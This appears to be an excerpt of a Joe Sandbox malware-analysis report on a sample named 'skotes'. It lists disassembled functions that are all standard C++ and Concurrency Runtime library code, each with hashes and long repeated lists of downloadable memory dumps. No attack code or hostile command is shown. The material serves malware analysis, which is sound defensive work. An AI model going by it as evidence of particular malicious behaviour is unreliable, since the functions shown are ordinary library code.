Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0096DE74

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: 06210441767c03925dcda61587db87a8022c6c8a1c1f02138f3f57e4da649b59
Instruction ID: bd231cae385fc485b95cb160e95dfd4a5e82b9ad0c077c18c85efa662c7d5dad
Opcode Fuzzy Hash: 06210441767c03925dcda61587db87a8022c6c8a1c1f02138f3f57e4da649b59
Instruction Fuzzy Hash: 8041D030F062449BCF25FFA485657BC77A96F90304F0444A9E8A16F2D3DB364E08CB62

Function 0096E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0096E7D7

Part of subcall function 0096E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0096E577
Part of subcall function 0096E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0096E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0096E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0096E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0096E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0096E879
Concurrency::location::_Assign.LIBCMT ref: 0096E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0096E8B5

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: bef709b3e6bd73493ddeda3b9004729fd3c37dc4655a6b5fed5bc72ae865e7ed
Instruction ID: 7e4e80aca0c73314aa5b8c65fa8a1b3467ab15677aa88d1a9355aa180bf6ffb6
Opcode Fuzzy Hash: bef709b3e6bd73493ddeda3b9004729fd3c37dc4655a6b5fed5bc72ae865e7ed
Instruction Fuzzy Hash: F3413A79A00214DFCF05EF64C495BADB7B9FF88310F1480AAED599B382DB34A941CB91

Function 00956E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00956ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00956F22
std::_Rethrow_future_exception.LIBCPMT ref: 00956F32
__Mtx_unlock.LIBCPMT ref: 00956FD5
__Mtx_unlock.LIBCPMT ref: 009570DB
__Mtx_unlock.LIBCPMT ref: 00957116

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 963e58b5daa823520ceac4deadea8aa72ad78cba96ba4189a90d090232e54b91
Instruction ID: db8ed7bf9f7cb0feca76158f061bfae8be5eb7201dc31213faaba975b77009e7
Opcode Fuzzy Hash: 963e58b5daa823520ceac4deadea8aa72ad78cba96ba4189a90d090232e54b91
Instruction Fuzzy Hash: 37C1C0B0D047049FDB20DFB6D845BAABBF8AF45312F00452DEC1697691DB35AA4CCB61

Function 009644DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00964538
ListArray.LIBCONCRT ref: 0096456C
Hash.LIBCMT ref: 009645D5
Hash.LIBCMT ref: 009645E5

Part of subcall function 00969C41: std::bad_exception::bad_exception.LIBCMT ref: 00969C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0096474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009647A4

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: c8cc6295f69623ea4bbd8ee941f40f5865f41e4d3d63700c4f85eb70adf6b1da
Instruction ID: 6760d343f0b63f074368777ca467654fbb0242da88b8a5ba60215d401472424e
Opcode Fuzzy Hash: c8cc6295f69623ea4bbd8ee941f40f5865f41e4d3d63700c4f85eb70adf6b1da
Instruction Fuzzy Hash: AD8160B0A11B52FAD708DFB5C981BD9FBA8BF49714F10421BF42897281DBB4A524CBD1

Function 0095EE5F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0095EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0095EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0095EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0095EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0095EF31

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
